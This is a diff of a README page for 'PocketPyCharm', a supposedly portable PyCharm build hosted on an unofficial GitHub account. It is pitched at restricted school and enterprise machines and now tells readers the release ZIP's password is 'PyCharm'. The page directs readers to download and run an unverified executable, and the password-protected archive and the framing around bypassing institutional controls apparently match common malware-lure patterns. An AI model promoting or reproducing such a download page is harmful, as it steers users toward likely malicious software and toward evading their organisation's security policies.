m97493578-ops/PocketPyCharm/index.md

 * **[Download Standard Archive (ZIP)](https://github.com/m97493578-ops/PocketPyCharm/releases)**
     * Optimized for restricted school or enterprise environments.
-    * Requires manual folder extraction.
+    * Redirects internal configuration structures natively.
+    * *🔑 Note: If extracted using 7-Zip, the file password is `PyCharm`.*

 ## ⚡ Features

 * **No Admin Rights**: Runs entirely within user folders without registry modifications.
-* **Fully Portable**: Carry your complete Python IDE workspace directly on a USB drive.
+* **Zero Host Pollution**: Isolation of all system, plugins, and logs configurations.
 * **AMD64 Native**: Optimized to run smoothly on modern 64-bit Windows machines.

 ## 🚀 Quick Start Guide

-1. Download the latest version package from our official **[Releases Page](https://github.com/m97493578-ops/PocketPyCharm/releases)**.
+1. Download the latest `PocketPyCharm.zip` version package from our official **[Releases Page](https://github.com/m97493578-ops/PocketPyCharm/releases)**.
-2. Unpack or extract the file bundle into your local directory (e.g., `Documents` or a `USB`).
+2. Unpack or extract the file archive completely into your local directory (e.g., `Documents` or a `USB`).
 3. Open the `bin` folder and run `pycharm64.exe` to launch your portable IDE!